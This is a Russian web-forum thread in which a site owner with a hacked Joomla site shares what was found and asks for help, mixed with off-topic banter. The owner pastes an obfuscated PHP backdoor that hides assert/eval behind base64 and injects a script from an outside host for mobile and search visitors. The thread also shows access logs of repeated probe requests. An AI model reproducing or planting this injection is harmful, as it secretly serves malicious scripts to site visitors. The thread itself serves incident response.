Баста

Баста
Рейтинг
43
Регистрация
30.05.2011

Возьмите любой понравившийся шаблон и переделайте его до неузнаваемости. А так отдайте от 5000 рублей за уникальный шаблон и не партесь. Сайт же не для баловства делайте или как !?

Где то нормально, а где то нет. Больше в +:)

security-guru:


и на всякий случай уточню - а ftpшный пароль сменили? или исключили ftp посмотрев логи?

Менял и не раз.

Как можно Shell код найти автоматический, перелопатив все файлы ?

Вот сам код:

<?php

$_ = strrev('tressa'); @$_("e\166\141\154\050b\141\163\145\066\064\137\14 4\145\143\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcv dGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YX AueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NF UFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbm Ryb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3Jp Y2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbm V8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8 bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG 18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8 c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZX x0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3 YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQC RfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19t YXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJi YgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFu dHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbm RleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9B R0VOVCddKSkgeyBlY2hvICc8c2NyaXB0IHNyYz0iaHR0cDovL2 1vYmlsZS1jb250ZW50LmluZm8vanF1ZXJ5LTEuNy4xLmpzIj48 L3NjcmlwdD4nOyBmbHVzaCgpOyBleGl0OyB9'\051\051\073" );
?>
<?php

Вот еще заблокировал в .htaccess бота ezooms.bot@gmail.com Может в нем проблема ? Может не заблокировал полностью.

По логам и до сих пор ломятся.

сайт.ру 88.249.88.183 - - [22/Feb/2013:15:24:51 +0400] "POST /administrator/components/com_weblinks/views/weblink/config.php HTTP/1.1" 403 185 "-" "Mozilla/5.0" 0.015
сайт.ру 41.220.69.76 - - [22/Feb/2013:15:26:39 +0400] "POST /administrator/components/com_weblinks/views/weblink/config.php HTTP/1.1" 403 185 "-" "Mozilla/5.0" 0.004
сайт.ру 93.172.51.52 - - [22/Feb/2013:15:26:41 +0400] "POST /administrator/components/com_weblinks/views/weblink/config.php HTTP/1.1" 403 185 "-" "Mozilla/5.0" 0.003
сайт.ру 46.48.161.74 - - [22/Feb/2013:15:27:11 +0400] "POST /administrator/components/com_weblinks/views/weblink/config.php HTTP/1.1" 403 185 "-" "Mozilla/5.0" 0.003
сайт.ру 124.244.128.79 - - [22/Feb/2013:15:36:30 +0400] "POST /administrator/components/com_weblinks/views/weblink/config.php HTTP/1.1" 403 185 "-" "Mozilla/5.0" 0.004
сайт.ру 188.81.233.223 - - [22/Feb/2013:15:40:00 +0400] "POST /administrator/components/com_weblinks/views/weblink/config.php HTTP/1.1" 403 185 "-" "Mozilla/5.0" 0.015
сайт.ру 83.203.246.14 - - [22/Feb/2013:15:58:26 +0400] "POST /administrator/components/com_weblinks/views/weblink/config.php HTTP/1.1" 403 185 "-" "Mozilla/5.0" 0.003
сайт.ру 83.247.136.63 - - [22/Feb/2013:16:01:19 +0400] "POST /administrator/components/com_weblinks/views/weblink/config.php HTTP/1.1" 403 185 "-" "Mozilla/5.0" 0.0

Видимо бот

Н-н-не-нефтянник:
ИгрАвой сайт нового покАления... тупа ставить новАсти

У меня такого нет. Не надо тут гуся выводить🙅

Н-н-не-нефтянник:
и прочие шедевры.
Ваши посты явно доказывают, что вы в состоянии писать без таких ошибок. Значит, вы их делаете не случайно, что-то мутите тут, народ в заблуждение вводите, провоцируете на высказывания. Троллите, то есть. О том и речь.
Может, вы клон модератора какого-нибудь? По поручению администрации, оживляете пейзаж стебно-деловыми топиками? Не? На белорсских форумах обязательно такие сотрудники есть. Может, и Grey завёл.

Батенька, да вы Андерсон.

Н-н-не-нефтянник:
деловыми топиками

Я под столом😂

Извините, что интересно, то и пишу в соответствующем форуме и разделе.

Members:
У меня тут /tmp был jos_9bqu.php, посмотри у себя.

С папки /tmp все уже вычистил

А у нас новая сотрудница и даже не чего😂

С понедельника будем вместе работать, в одном отделе ))

Den73:
нада изучить логи и все)) ну и POST логирование включить, все станет ясно без известных дыр в паблике

Хостинг только показывает обращения к файлам😡

Вот кстати интересно почитать: Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

gesNake, домен смените

Белый Ум:
По моему Баста просто жирный троль.

Это почему же ?

Тролль, пишется с двумя буквами л🙅

Всего: 243